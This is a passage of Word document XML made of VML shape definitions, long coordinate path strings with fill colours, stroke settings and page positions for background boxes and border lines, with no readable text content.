0,10484,15352,10484,15354,10484,15356,10484,15358,10484,15360,10484,15362,10484,15365,10484,15367,10484,15370,10484,15372,10484,15375,10484,15378,10484,15381,10484,15384,10484,15387,10484,15390,10484,15393,10484,15396,10484,15400,10484,15403,10484,15407,10484,15411,10484,15414,10484,15418,10484,15422,10484,15426,10484,15431,10484,15435,10484,15439,10484,15444,10484,15449,10484,15453,10484,15458,10484,15463,10484,15468,10484,15474,10484,15479,10484,15484,10484,15490,10484,15496,10484,15502,10484,15508,10484,15514,10484,15520,10484,15526,10484,15533,10484,15539,10484,15546,10484,15553,10484,15560,10484,15567,10484,15574,10484,15582,10484,15589,10484,15597,10484,15605,10484,15613,10484,15621,10484,15630,10484,15638,10484,15647,10484,15655,10484,15664,10484,15673,10484,15683,10484,15692,10484,15692,10484,15692,10484,15692,10484,15692,10484,15692,10484,15692,10483,15692,10482,15692,10482,15692,10480,15692,10479,15692,10477,15692,10475,15692,10473,15692,10470,15692,10466,15692,10462,15692,10458,15692,10453,15692,10448,15692,10442,15692,10435,15692,10428,15692,10419,15692,10411,15692,10401,15692,10391,15692,10379,15692,10367,15692,10354,15692,10340,15692,10326,15692,10310,15692,10293,15692,10275,15692,10256,15692,10236,15692,10215,15692,10192,15692,10168,15692,10143,15692,10117,15692,10090,15692,10061,15692,10031,15692,9999,15692,9966,15692,9931,15692,9895,15692,9858,15692,9819,15692,9778,15692,9735,15692,9691,15692,9646,15692,9598,15692,9549,15692,9498,15692,9445,15692,9391,15692,9334,15692,9275,15692,9215,15692,9153,15692,9088,15692,9022,15692,8953,15692,8883,15692,8810,15692,8735,15692,8658,15692,8578,15692,8497,15692,8413,15692,8326,15692,8238,15692,8146,15692,8053,15692,7957,15692,7859,15692,7758,15692,7654,15692,7548,15692,7439,15692,7328,15692,7214,15692,7097,15692,6977,15692,6855,15692,6730,15692,6602,15692,6471,15692,6337,15692,6201,15692,6061,15692,5918,15692,5773,15692,5624,15692,5472,15692,5317,15692,5159,15692,4997,15692,4833,15692,4665,15692,4494,15692,4319,15692,4141,15692,3960,15692,3776,15692,3587,15692,3396,15692,3201,15692,3002,15692,2800,15692,2594,15692,2385,15692,2172,15692,1955,15692,1734,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15692,1510,15691,1510,15691,1510,15691,1510,15691,1510,15691,1510,15691,1510,15690,1510,15690,1510,15690,1510,15690,1510,15689,1510,15689,1510,15688,1510,15688,1510,15688,1510,15687,1510,15686,1510,15686,1510,15685,1510,15685,1510,15684,1510,15683,1510,15682,1510,15682,1510,15681,1510,15680,1510,15679,1510,15678,1510,15677,1510,15675,1510,15674,1510,15673,1510,15672,1510,15670,1510,15669,1510,15667,1510,15666,1510,15664,1510,15662,1510,15661,1510,15659,1510,15657,1510,15655,1510,15653,1510,15651,1510,15648,1510,15646,1510,15644,1510,15641,1510,15639,1510,15636,1510,15634,1510,15631,1510,15628,1510,15625,1510,15622,1510,15619,1510,15616,1510,15612,1510,15609,1510,15605,1510,15602,1510,15598,1510,15594,1510,15590,1510,15586,1510,15582,1510,15578,1510,15574,1510,15569,1510,15565,1510,15560,1510,15555,1510,15550,1510,15545,1510,15540,1510,15535,1510,15530,1510,15524,1510,15519,1510,15513,1510,15507,1510,15501,1510,15495,1510,15489,1510,15482,1510,15476,1510,15469,1510,15463,1510,15456,1510,15449,1510,15441,1510,15434,1510,15427,1510,15419,1510,15411,1510,15404,1510,15396,1510,15387,1510,15379,1510,15371,1510,15362,1510,15353,1510,15344,1510,15335,1510,15326,1510,15317e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:765.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15310" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15310;width:30;height:370" coordorigin="1490,15310" coordsize="30,370" path="m1517,15317l1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15318,1517,15318,1517,15318,1517,15318,1517,15318,1517,15319,1517,15319,1517,15319,1517,15320,1517,15320,1517,15321,1517,15321,1517,15322,1517,15322,1517,15323,1517,15323,1517,15324,1517,15325,1517,15325,1517,15326,1517,15327,1517,15328,1517,15329,1517,15330,1517,15331,1517,15332,1517,15333,1517,15334,1517,15336,1517,15337,1517,15338,1517,15340,1517,15341,1517,15343,1517,15345,1517,15346,1517,15348,1517,15350,1517,15352,1517,15354,1517,15356,1517,15358,1517,15360,1517,15362,1517,15365,1517,15367,1517,15370,1517,15372,1517,15375,1517,15378,1517,15381,1517,15384,1517,15387,1517,15390,1517,15393,1517,15396,1517,15400,1517,15403,1517,15407,1517,15411,1517,15414,1517,15418,1517,15422,1517,15426,1517,15431,1517,15435,1517,15439,1517,15444,1517,15449,1517,15453,1517,15458,1517,15463,1517,15468,1517,15474,1517,15479,1517,15484,1517,15490,1517,15496,1517,15502,1517,15508,1517,15514,1517,15520,1517,15526,1517,15533,1517,15539,1517,15546,1517,15553,1517,15560,1517,15567,1517,15574,1517,15582,1517,15589,1517,15597,1517,15605,1517,15613,1517,15621,1517,15630,1517,15638,1517,15647,1517,15655,1517,15664,1517,15673,1517,15683,1517,15692e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:116.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,2330" coordsize="130,270">
        <v:shape style="position:absolute;left:4090;top:2330;width:130;height:270" coordorigin="4090,2330" coordsize="130,270" path="m4106,2350l4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4106,2350,4107,2350,4107,2350,4107,2350,4107,2350,4107,2350,4107,2350,4107,2350,4107,2350,4107,2350,4108,2350,4108,2350,4108,2350,4108,2350,4108,2350,4109,2350,4109,2350,4109,2350,4109,2350,4110,2350,4110,2350,4110,2350,4111,2350,4111,2350,4111,2350,4112,2350,4112,2350,4113,2350,4113,2350,4113,2350,4114,2350,4114,2350,4115,2350,4116,2350,4116,2350,4117,2350,4117,2350,4118,2350,4119,2350,4119,2350,4120,2350,4121,2350,4121,2350,4122,2350,4123,2350,4124,2350,4125,2350,4126,2350,4127,2350,4127,2350,4128,2350,4129,2350,4131,2350,4132,2350,4133,2350,4134,2350,4135,2350,4136,2350,4137,2350,4139,2350,4140,2350,4141,2350,4143,2350,4144,2350,4145,2350,4147,2350,4148,2350,4150,2350,4151,2350,4153,2350,4155,2350,4156,2350,4158,2350,4160,2350,4162,2350,4163,2350,4165,2350,4167,2350,4169,2350,4171,2350,4173,2350,4175,2350,4177,2350,4179,2350,4182,2350,4184,2350,4186,2350,4189,2350,4191,2350,4193,2350,4196,2350,4198,2350,4201,2350,4204,2350,4206,2350,4209,2350,4212,2350,4214,2350,4217,2350,4220,2350,4223,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2350,4226,2351,4226,2351,4226,2351,4226,2351,4226,2351,4226,2351,4226,2351,4226,2351,4226,2352,4226,2352,4226,2352,4226,2352,4226,2353,4226,2353,4226,2353,4226,2354,4226,2354,4226,2354,4226,2355,4226,2355,4226,2356,4226,2356,4226,2357,4226,2357,4226,2358,4226,2358,4226,2359,4226,2360,4226,2361,4226,2361,4226,2362,4226,2363,4226,2364,4226,2365,4226,2366,4226,2367,4226,2368,4226,2369,4226,2370,4226,2371,4226,2373,4226,2374,4226,2375,4226,2377,4226,2378,4226,2380,4226,2381,4226,2383,4226,2385,4226,2386,4226,2388,4226,2390,4226,2392,4226,2394,4226,2396,4226,2398,4226,2400,4226,2402,4226,2404,4226,2407,4226,2409,4226,2412,4226,2414,4226,2417,4226,2419,4226,2422,4226,2425,4226,2428,4226,2431,4226,2434,4226,2437,4226,2440,4226,2443,4226,2446,4226,2450,4226,2453,4226,2457,4226,2461,4226,2464,4226,2468,4226,2472,4226,2476,4226,2480,4226,2484,4226,2488,4226,2493,4226,2497,4226,2502,4226,2506,4226,2511,4226,2516,4226,2520,4226,2525,4226,2530,4226,2536,4226,2541,4226,2546,4226,2552,4226,2557,4226,2563,4226,2569,4226,2574,4226,2580,4226,2586,4226,2593,4226,2599,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4226,2605,4225,2605,4225,2605,4225,2605,4225,2605,4225,2605,4225,2605,4225,2605,4225,2605,4224,2605,4224,2605,4224,2605,4224,2605,4224,2605,4223,2605,4223,2605,4223,2605,4223,2605,4222,2605,4222,2605,4222,2605,4221,2605,4221,2605,4220,2605,4220,2605,4220,2605,4219,2605,4219,2605,4218,2605,4218,2605,4217,2605,4217,2605,4216,2605,4216,2605,4215,2605,4214,2605,4214,2605,4213,2605,4212,2605,4211,2605,4211,2605,4210,2605,4209,2605,4208,2605,4207,2605,4207,2605,4206,2605,4205,2605,4204,2605,4203,2605,4202,2605,4201,2605,4200,2605,4198,2605,4197,2605,4196,2605,4195,2605,4194,2605,4192,2605,4191,2605,4190,2605,4188,2605,4187,2605,4185,2605,4184,2605,4182,2605,4181,2605,4179,2605,4178,2605,4176,2605,4174,2605,4172,2605,4171,2605,4169,2605,4167,2605,4165,2605,4163,2605,4161,2605,4159,2605,4157,2605,4155,2605,4153,2605,4151,2605,4148,2605,4146,2605,4144,2605,4141,2605,4139,2605,4136,2605,4134,2605,4131,2605,4129,2605,4126,2605,4123,2605,4121,2605,4118,2605,4115,2605,4112,2605,4109,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2605,4106,2604,4106,2604,4106,2604,4106,2604,4106,2604,4106,2603,4106,2603,4106,2603,4106,2603,4106,2602,4106,2602,4106,2602,4106,2601,4106,2601,4106,2600,4106,2600,4106,2599,4106,2599,4106,2598,4106,2598,4106,2597,4106,2596,4106,2596,4106,2595,4106,2594,4106,2593,4106,2592,4106,2592,4106,2591,4106,2590,4106,2589,4106,2587,4106,2586,4106,2585,4106,2584,4106,2583,4106,2581,4106,2580,4106,2579,4106,2577,4106,2576,4106,2574,4106,2573,4106,2571,4106,2569,4106,2567,4106,2566,4106,2564,4106,2562,4106,2560,4106,2558,4106,2556,4106,2553,4106,2551,4106,2549,4106,2546,4106,2544,4106,2541,4106,2539,4106,2536,4106,2533,4106,2531,4106,2528,4106,2525,4106,2522,4106,2519,4106,2516,4106,2512,4106,2509,4106,2506,4106,2502,4106,2499,4106,2495,4106,2491,4106,2487,4106,2484,4106,2480,4106,2476,4106,2471,4106,2467,4106,2463,4106,2458,4106,2454,4106,2449,4106,2445,4106,2440,4106,2435,4106,2430,4106,2425,4106,2420,4106,2415,4106,2409,4106,2404,4106,2398,4106,2393,4106,2387,4106,2381,4106,2375,4106,2369,4106,2363,4106,2357,4106,2350e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:198.500pt;margin-top:171.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3970,3430" coordsize="130,270">
        <v:shape style="position:absolute;left:3970;top:3430;width:130;height:270" coordorigin="3970,3430" coordsize="130,270" path="m3986,3446l3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3986,3446,3987,3446,3987,3446,3987,3446,3987,3446,3987,3446,3987,3446,3987,3446,3987,3446,3988,3446,3988,3446,3988,3446,3988,3446,3988,3446,3989,3446,3989,3446,3989,3446,3989,3446,3990,3446,3990,3446,3990,3446,3991,3446,3991,3446,3991,3446,3992,3446,3992,3446,3992,3446,3993,3446,3993,3446,3994,3446,3994,3446,3995,3446,3995,3446,3996,3446,3997,3446,3997,3446,3998,3446,3999,3446,3999,3446,4000,3446,4001,3446,4001,3446,4002,3446,4003,3446,4004,3446,4005,3446,4006,3446,4006,3446,4007,3446,4008,3446,4009,3446,4010,3446,4012,3446,4013,3446,4014,3446,4015,3446,4016,3446,4017,3446,4019,3446,4020,3446,4021,3446,4022,3446,4024,3446,4025,3446,4027,3446,4028,3446,4030,3446,4031,3446,4033,3446,4035,3446,4036,3446,4038,3446,4040,3446,4041,3446,4043,3446,4045,3446,4047,3446,4049,3446,4051,3446,4053,3446,4055,3446,4057,3446,4059,3446,4062,3446,4064,3446,4066,3446,4068,3446,4071,3446,4073,3446,4076,3446,4078,3446,4081,3446,4083,3446,4086,3446,4089,3446,4092,3446,4094,3446,4097,3446,4100,3446,4103,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3446,4106,3447,4106,3447,4106,3447,4106,3447,4106,3447,4106,3448,4106,3448,4106,3448,4106,3448,4106,3449,4106,3449,4106,3449,4106,3450,4106,3450,4106,3451,4106,3451,4106,3452,4106,3452,4106,3453,4106,3453,4106,3454,4106,3455,4106,3455,4106,3456,4106,3457,4106,3458,4106,3459,4106,3460,4106,3460,4106,3461,4106,3462,4106,3464,4106,3465,4106,3466,4106,3467,4106,3468,4106,3470,4106,3471,4106,3472,4106,3474,4106,3475,4106,3477,4106,3478,4106,3480,4106,3482,4106,3484,4106,3485,4106,3487,4106,3489,4106,3491,4106,3493,4106,3495,4106,3498,4106,3500,4106,3502,4106,3505,4106,3507,4106,3510,4106,3512,4106,3515,4106,3518,4106,3520,4106,3523,4106,3526,4106,3529,4106,3532,4106,3535,4106,3539,4106,3542,4106,3545,4106,3549,4106,3552,4106,3556,4106,3560,4106,3564,4106,3568,4106,3571,4106,3576,4106,3580,4106,3584,4106,3588,4106,3593,4106,3597,4106,3602,4106,3606,4106,3611,4106,3616,4106,3621,4106,3626,4106,3631,4106,3636,4106,3642,4106,3647,4106,3653,4106,3658,4106,3664,4106,3670,4106,3676,4106,3682,4106,3688,4106,3694,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4106,3701,4105,3701,4105,3701,4105,3701,4105,3701,4105,3701,4105,3701,4105,3701,4105,3701,4105,3701,4104,3701,4104,3701,4104,3701,4104,3701,4104,3701,4103,3701,4103,3701,4103,3701,4102,3701,4102,3701,4102,3701,4102,3701,4101,3701,4101,3701,4100,3701,4100,3701,4100,3701,4099,3701,4099,3701,4098,3701,4098,3701,4097,3701,4097,3701,4096,3701,4095,3701,4095,3701,4094,3701,4094,3701,4093,3701,4092,3701,4091,3701,4091,3701,4090,3701,4089,3701,4088,3701,4087,3701,4087,3701,4086,3701,4085,3701,4084,3701,4083,3701,4082,3701,4081,3701,4079,3701,4078,3701,4077,3701,4076,3701,4075,3701,4074,3701,4072,3701,4071,3701,4070,3701,4068,3701,4067,3701,4065,3701,4064,3701,4062,3701,4061,3701,4059,3701,4058,3701,4056,3701,4054,3701,4052,3701,4051,3701,4049,3701,4047,3701,4045,3701,4043,3701,4041,3701,4039,3701,4037,3701,4035,3701,4033,3701,4030,3701,4028,3701,4026,3701,4024,3701,4021,3701,4019,3701,4016,3701,4014,3701,4011,3701,4009,3701,4006,3701,4003,3701,4001,3701,3998,3701,3995,3701,3992,3701,3989,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3701,3986,3700,3986,3700,3986,3700,3986,3700,3986,3700,3986,3700,3986,3700,3986,3699,3986,3699,3986,3699,3986,3699,3986,3698,3986,3698,3986,3698,3986,3698,3986,3697,3986,3697,3986,3696,3986,3696,3986,3695,3986,3695,3986,3694,3986,3694,3986,3693,3986,3693,3986,3692,3986,3691,3986,3690,3986,3690,3986,3689,3986,3688,3986,3687,3986,3686,3986,3685,3986,3684,3986,3683,3986,3682,3986,3681,3986,3680,3986,3678,3986,3677,3986,3676,3986,3674,3986,3673,3986,3671,3986,3670,3986,3668,3986,3666,3986,3665,3986,3663,3986,3661,3986,3659,3986,3657,3986,3655,3986,3653,3986,3651,3986,3649,3986,3647,3986,3644,3986,3642,3986,3640,3986,3637,3986,3634,3986,3632,3986,3629,3986,3626,3986,3623,3986,3620,3986,3617,3986,3614,3986,3611,3986,3608,3986,3605,3986,3601,3986,3598,3986,3594,3986,3590,3986,3587,3986,3583,3986,3579,3986,3575,3986,3571,3986,3567,3986,3563,3986,3558,3986,3554,3986,3549,3986,3545,3986,3540,3986,3535,3986,3531,3986,3526,3986,3521,3986,3515,3986,3510,3986,3505,3986,3499,3986,3494,3986,3488,3986,3482,3986,3477,3986,3471,3986,3465,3986,3458,3986,3452,3986,3446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:190.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,3810" coordsize="130,250">
        <v:shape style="position:absolute;left:4090;top:3810;width:130;height:250" coordorigin="4090,3810" coordsize="130,250" path="m4106,3821l4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4106,3821,4107,3821,4107,3821,4107,3821,4107,3821,4107,3821,4107,3821,4107,3821,4107,3821,4107,3821,4108,3821,4108,3821,4108,3821,4108,3821,4108,3821,4109,3821,4109,3821,4109,3821,4109,3821,4110,3821,4110,3821,4110,3821,4111,3821,4111,3821,4111,3821,4112,3821,4112,3821,4113,3821,4113,3821,4113,3821,4114,3821,4114,3821,4115,3821,4116,3821,4116,3821,4117,3821,4117,3821,4118,3821,4119,3821,4119,3821,4120,3821,4121,3821,4121,3821,4122,3821,4123,3821,4124,3821,4125,3821,4126,3821,4127,3821,4127,3821,4128,3821,4129,3821,4131,3821,4132,3821,4133,3821,4134,3821,4135,3821,4136,3821,4137,3821,4139,3821,4140,3821,4141,3821,4143,3821,4144,3821,4145,3821,4147,3821,4148,3821,4150,3821,4151,3821,4153,3821,4155,3821,4156,3821,4158,3821,4160,3821,4162,3821,4163,3821,4165,3821,4167,3821,4169,3821,4171,3821,4173,3821,4175,3821,4177,3821,4179,3821,4182,3821,4184,3821,4186,3821,4189,3821,4191,3821,4193,3821,4196,3821,4198,3821,4201,3821,4204,3821,4206,3821,4209,3821,4212,3821,4214,3821,4217,3821,4220,3821,4223,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3821,4226,3822,4226,3822,4226,3822,4226,3822,4226,3822,4226,3822,4226,3823,4226,3823,4226,3823,4226,3823,4226,3824,4226,3824,4226,3824,4226,3825,4226,3825,4226,3825,4226,3826,4226,3826,4226,3827,4226,3827,4226,3828,4226,3829,4226,3829,4226,3830,4226,3831,4226,3831,4226,3832,4226,3833,4226,3834,4226,3835,4226,3836,4226,3837,4226,3838,4226,3839,4226,3840,4226,3841,4226,3842,4226,3843,4226,3845,4226,3846,4226,3848,4226,3849,4226,3850,4226,3852,4226,3854,4226,3855,4226,3857,4226,3859,4226,3861,4226,3863,4226,3864,4226,3866,4226,3869,4226,3871,4226,3873,4226,3875,4226,3877,4226,3880,4226,3882,4226,3885,4226,3887,4226,3890,4226,3893,4226,3896,4226,3898,4226,3901,4226,3904,4226,3907,4226,3911,4226,3914,4226,3917,4226,3921,4226,3924,4226,3928,4226,3931,4226,3935,4226,3939,4226,3943,4226,3947,4226,3951,4226,3955,4226,3959,4226,3963,4226,3968,4226,3972,4226,3977,4226,3982,4226,3986,4226,3991,4226,3996,4226,4001,4226,4006,4226,4012,4226,4017,4226,4022,4226,4028,4226,4034,4226,4039,4226,4045,4226,4051,4226,4057,4226,4063,4226,4070,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4226,4076,4225,4076,4225,4076,4225,4076,4225,4076,4225,4076,4225,4076,4225,4076,4225,4076,4224,4076,4224,4076,4224,4076,4224,4076,4224,4076,4223,4076,4223,4076,4223,4076,4223,4076,4222,4076,4222,4076,4222,4076,4221,4076,4221,4076,4220,4076,4220,4076,4220,4076,4219,4076,4219,4076,4218,4076,4218,4076,4217,4076,4217,4076,4216,4076,4216,4076,4215,4076,4214,4076,4214,4076,4213,4076,4212,4076,4211,4076,4211,4076,4210,4076,4209,4076,4208,4076,4207,4076,4207,4076,4206,4076,4205,4076,4204,4076,4203,4076,4202,4076,4201,4076,4200,4076,4198,4076,4197,4076,4196,4076,4195,4076,4194,4076,4192,4076,4191,4076,4190,4076,4188,4076,4187,4076,4185,4076,4184,4076,4182,4076,4181,4076,4179,4076,4178,4076,4176,4076,4174,4076,4172,4076,4171,4076,4169,4076,4167,4076,4165,4076,4163,4076,4161,4076,4159,4076,4157,4076,4155,4076,4153,4076,4151,4076,4148,4076,4146,4076,4144,4076,4141,4076,4139,4076,4136,4076,4134,4076,4131,4076,4129,4076,4126,4076,4123,4076,4121,4076,4118,4076,4115,4076,4112,4076,4109,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4076,4106,4075,4106,4075,4106,4075,4106,4075,4106,4075,4106,4075,4106,4074,4106,4074,4106,4074,4106,4074,4106,4073,4106,4073,4106,4073,4106,4072,4106,4072,4106,4072,4106,4071,4106,4071,4106,4070,4106,4070,4106,4069,4106,4068,4106,4068,4106,4067,4106,4066,4106,4066,4106,4065,4106,4064,4106,4063,4106,4062,4106,4061,4106,4060,4106,4059,4106,4058,4106,4057,4106,4056,4106,4055,4106,4054,4106,4052,4106,4051,4106,4049,4106,4048,4106,4047,4106,4045,4106,4043,4106,4042,4106,4040,4106,4038,4106,4036,4106,4034,4106,4033,4106,4031,4106,4028,4106,4026,4106,4024,4106,4022,4106,4020,4106,4017,4106,4015,4106,4012,4106,4010,4106,4007,4106,4004,4106,4001,4106,3999,4106,3996,4106,3993,4106,3989,4106,3986,4106,3983,4106,3980,4106,3976,4106,3973,4106,3969,4106,3966,4106,3962,4106,3958,4106,3954,4106,3950,4106,3946,4106,3942,4106,3938,4106,3934,4106,3929,4106,3925,4106,3920,4106,3915,4106,3911,4106,3906,4106,3901,4106,3896,4106,3891,4106,3885,4106,3880,4106,3875,4106,3869,4106,3863,4106,3858,4106,3852,4106,3846,4106,3840,4106,3834,4106,3827,4106,3821e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:186.500pt;margin-top:256.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3730,5130" coordsize="130,270">
        <v:shape style="position:absolute;left:3730;top:5130;width:130;height:270" coordorigin="3730,5130" coordsize="130,270" path="m3746,5157l3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3746,5157,3747,5157,3747,5157,3747,5157,3747,5157,3747,5157,3747,5157,3747,5157,3747,5157,3748,5157,3748,5157,3748,5157,3748,5157,3748,5157,3749,5157,3749,5157,3749,5157,3749,5157,3750,5157,3750,5157,3750,5157,3751,5157,3751,5157,3752,5157,3752,5157,3752,5157,3753,5157,3753,5157,3754,5157,3754,5157,3755,5157,3755,5157,3756,5157,3756,5157,3757,5157,3758,5157,3758,5157,3759,5157,3760,5157,3761,5157,3761,5157,3762,5157,3763,5157,3764,5157,3765,5157,3765,5157,3766,5157,3767,5157,3768,5157,3769,5157,3770,5157,3771,5157,3772,5157,3774,5157,3775,5157,3776,5157,3777,5157,3778,5157,3780,5157,3781,5157,3782,5157,3784,5157,3785,5157,3787,5157,3788,5157,3790,5157,3791,5157,3793,5157,3794,5157,3796,5157,3798,5157,3800,5157,3801,5157,3803,5157,3805,5157,3807,5157,3809,5157,3811,5157,3813,5157,3815,5157,3817,5157,3819,5157,3821,5157,3824,5157,3826,5157,3828,5157,3831,5157,3833,5157,3836,5157,3838,5157,3841,5157,3843,5157,3846,5157,3849,5157,3851,5157,3854,5157,3857,5157,3860,5157,3863,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5157,3866,5158,3866,5158,3866,5158,3866,5158,3866,5158,3866,5159,3866,5159,3866,5159,3866,5160,3866,5160,3866,5160,3866,5161,3866,5161,3866,5162,3866,5162,3866,5163,3866,5163,3866,5164,3866,5164,3866,5165,3866,5166,3866,5166,3866,5167,3866,5168,3866,5169,3866,5169,3866,5170,3866,5171,3866,5172,3866,5173,3866,5174,3866,5176,3866,5177,3866,5178,3866,5179,3866,5180,3866,5182,3866,5183,3866,5185,3866,5186,3866,5188,3866,5189,3866,5191,3866,5193,3866,5194,3866,5196,3866,5198,3866,5200,3866,5202,3866,5204,3866,5206,3866,5209,3866,5211,3866,5213,3866,5215,3866,5218,3866,5220,3866,5223,3866,5226,3866,5228,3866,5231,3866,5234,3866,5237,3866,5240,3866,5243,3866,5246,3866,5250,3866,5253,3866,5256,3866,5260,3866,5263,3866,5267,3866,5271,3866,5274,3866,5278,3866,5282,3866,5286,3866,5291,3866,5295,3866,5299,3866,5303,3866,5308,3866,5313,3866,5317,3866,5322,3866,5327,3866,5332,3866,5337,3866,5342,3866,5347,3866,5353,3866,5358,3866,5364,3866,5369,3866,5375,3866,5381,3866,5387,3866,5393,3866,5399,3866,5405,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3866,5412,3865,5412,3865,5412,3865,5412,3865,5412,3865,5412,3865,5412,3865,5412,3865,5412,3865,5412,3864,5412,3864,5412,3864,5412,3864,5412,3864,5412,3863,5412,3863,5412,3863,5412,3863,5412,3862,5412,3862,5412,3862,5412,3861,5412,3861,5412,3861,5412,3860,5412,3860,5412,3859,5412,3859,5412,3859,5412,3858,5412,3858,5412,3857,5412,3856,5412,3856,5412,3855,5412,3855,5412,3854,5412,3853,5412,3853,5412,3852,5412,3851,5412,3851,5412,3850,5412,3849,5412,3848,5412,3847,5412,3846,5412,3845,5412,3845,5412,3844,5412,3843,5412,3842,5412,3840,5412,3839,5412,3838,5412,3837,5412,3836,5412,3835,5412,3833,5412,3832,5412,3831,5412,3829,5412,3828,5412,3827,5412,3825,5412,3824,5412,3822,5412,3821,5412,3819,5412,3817,5412,3816,5412,3814,5412,3812,5412,3810,5412,3809,5412,3807,5412,3805,5412,3803,5412,3801,5412,3799,5412,3797,5412,3795,5412,3793,5412,3790,5412,3788,5412,3786,5412,3783,5412,3781,5412,3779,5412,3776,5412,3774,5412,3771,5412,3769,5412,3766,5412,3763,5412,3760,5412,3758,5412,3755,5412,3752,5412,3749,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5412,3746,5411,3746,5411,3746,5411,3746,5411,3746,5411,3746,5411,3746,5411,3746,5411,3746,5411,3746,5410,3746,5410,3746,5410,3746,5410,3746,5409,3746,5409,3746,5409,3746,5408,3746,5408,3746,5408,3746,5407,3746,5407,3746,5406,3746,5406,3746,5405,3746,5405,3746,5404,3746,5403,3746,5403,3746,5402,3746,5401,3746,5401,3746,5400,3746,5399,3746,5398,3746,5397,3746,5396,3746,5395,3746,5394,3746,5393,3746,5392,3746,5390,3746,5389,3746,5388,3746,5387,3746,5385,3746,5384,3746,5382,3746,5381,3746,5379,3746,5377,3746,5376,3746,5374,3746,5372,3746,5370,3746,5368,3746,5366,3746,5364,3746,5362,3746,5360,3746,5358,